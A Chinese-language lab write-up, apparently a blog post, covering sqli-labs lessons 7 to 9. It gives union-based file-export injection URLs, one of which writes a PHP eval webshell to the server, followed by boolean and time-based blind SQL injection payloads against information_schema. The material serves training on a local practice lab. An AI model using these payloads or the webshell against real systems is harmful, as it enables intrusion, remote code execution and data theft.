0x07 less-7
http://localhost/sqli-labs-master/Less-7/?id=1"-- +``` //首先要测试后台大概的查询语句
http://localhost/sqli-labs-master/Less-7/?id=0')) union select * from users into outfile ‘路径’ //可以导出文件
http://localhost/sqli-labs/Less-7/?id=1')) union select 1,'2','<?php @eval($_POST["caidao"]);?>' into outfile 'E:\\wamp\\www\\sqli-labs\\muma.php' %23 //可以插一句话0x08 less-8
加了单引号返回信息不一样,什么也没有,利用盲注
盲注需要掌握一些MySQL的相关函数:
length(str):返回str字符串的长度。
substr(str, pos, len):将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始
mid(str,pos,len):跟上面的一样,截取字符串
ascii(str):返回字符串str的最左面字符的ASCII代码值。
ord(str):同上,返回ascii码
if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0
首先要记得常见的ASCII,A:65,Z:90 a:97,z:122, 0:48, 9:57
http://localhost/sqli-labs-master/Less-8/?id=1' and ascii(substr((select database()),1,1))>96-- + //通过substr来选择判断的第几个字母,使用二分法来加快判断速度,盲注一般写脚本,记得select database要加括号
http://localhost/sqli-labs-master/Less-8/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1))>50-- + //继续选择表名等,主要注意要加上limit否则会返回多行数据
http://localhost/sqli-labs-master/Less-8/?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 limit 0,1),1,1))>50-- +0x09 less-9
不论输入是什么,返回的结果都是一样的。这里就要使用基于时间的盲注方法了
http://localhost/sqli-labs-master/Less-9/?id=1' and sleep(10)-- + //基于时间,判断后台参数的闭合方式```
http://localhost/sqli-labs/Less-9/?id=1' and sleep(5) %23
http://localhost/sqli-labs/Less-9/?id=1" and if(ascii(substr(database(),1,1))>115, 0, sleep(5)) %23
http://localhost/sqli-labs/Less-9/?id=1" and if(ascii(substr(database(),1,1))>114, 0, sleep(5)) %23
http://localhost/sqli-labs-master/Less-9/?id=1’ and if((select substr(table_name,1,1) from information_schema.tables where table_schema = database() limit 0,1)=’e’,sleep(10),null)– +
“`
3154
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
